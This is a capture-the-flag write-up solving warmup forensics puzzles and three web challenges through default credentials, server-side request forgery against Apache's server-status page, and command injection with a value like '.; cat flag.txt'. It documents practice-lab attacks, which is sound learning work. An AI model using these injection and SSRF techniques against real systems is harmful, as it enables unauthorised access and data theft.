Warmups - Tsunami
Downloading the file and running file command, we get its file type - an audio file.
Let’s think simple, and straight up open it in an audio editor - here I choose the open-source Audacity.
And that’s it, we got the flag!
Warmups - Pimple
Follow the exact same procedure as Tsunami, we have:
Okay so what’s a GIMP XCF image? A quick Google search led me to some interesting information, including the official documentation. Following this great article, I tried to use an online converter but it did not seems to work…
So let’s check GIMP package size, power off our attack machine, take a snapshot, then power it on again and sudo apt install gimp.
Renaming the file to pimple.xcf and open it in GIMP, we got the flag.
… Those morose eyes were exactly like mine when I worked on some challenges.
Warmups - Bass64
Oh, once again, hello John.
This challenge here is pretty straight-forward. Download the file, open it, then resize our editor window to a suitable dimension, we have
Directly base64 decoding it, we instantly got the flag.
Warmups - Read The Rules
As they said, please be a civilized player and read the rules. The flag’s in the source code.
Warmups - 2EZ
Another challenge from John. Let’s follow our procedure from previous challenges.
Seems like our file command did not have much use here. Let’s try strings.
JFIF… so it should be an image file. Renaming its extension to jpg or gif didn’t solve anything, and file command’s magic also didn’t recognize the file’s type. So its file signature must be wrong.
Open it up in a hex editor, we can clearly see our guess was right.
So we change the first 4 bytes accordingly to JFIF file signature and we got the flag!
Web - Swaggy
Following the url, we got to a pretty clean website.
Messing around a bit, we knew that this site use the GUI to make curl GET request to an API endpoint. Execute sent a HTTP GET request to the endpoint, but it required basic authentication, encoded in base64. I tried with ‘user:password’ but it returned 403: Invalid credentials.
So, I tried another default creadential - ‘admin:admin’. And to my surprise - it returned the flag quite easily.
Web - Titanic
Following the url, we got to a website with pretty decent UI. On a side note, you should really press that ‘Watch Video’ button, quite informative.
Right at the top of nav bar, we got the admin panel.
I tried some common credentials, as well as checking the source code and requests, but nothing particularly interesting found, except that it used GET for authentication, which’s specially unrecommendable. So I returned to the home page and it led me to another engrossing service.
I tried with https://google.com and it returned something like a screenshot image of Google. A flashback of HTB’s Love box, and I tried if it could also take a capture of local network sites.
So it got me a glimpse on a loading page, which’s not much of use in this case. I checked Wappalyzer and found out that the server ran on Apache. A quick Google search revealed that Apache servers have a default server-status site which can be useful for log checking.
And it actually did! Based on the requests’ parameters, we got an user’s credential. Logging in that account, we got the flag.
Web - Confidentiality
Another John Hammond’s challenge it seems.
So I just followed the placeholder and it gave me something that looks like a ls -l result.
Looks like this site just run whatever command we want in a bash, provided that it starts with ls -l. So here comes the payload.
And that’s it, we got the flag. You can also use .; cat flag.txt if you like.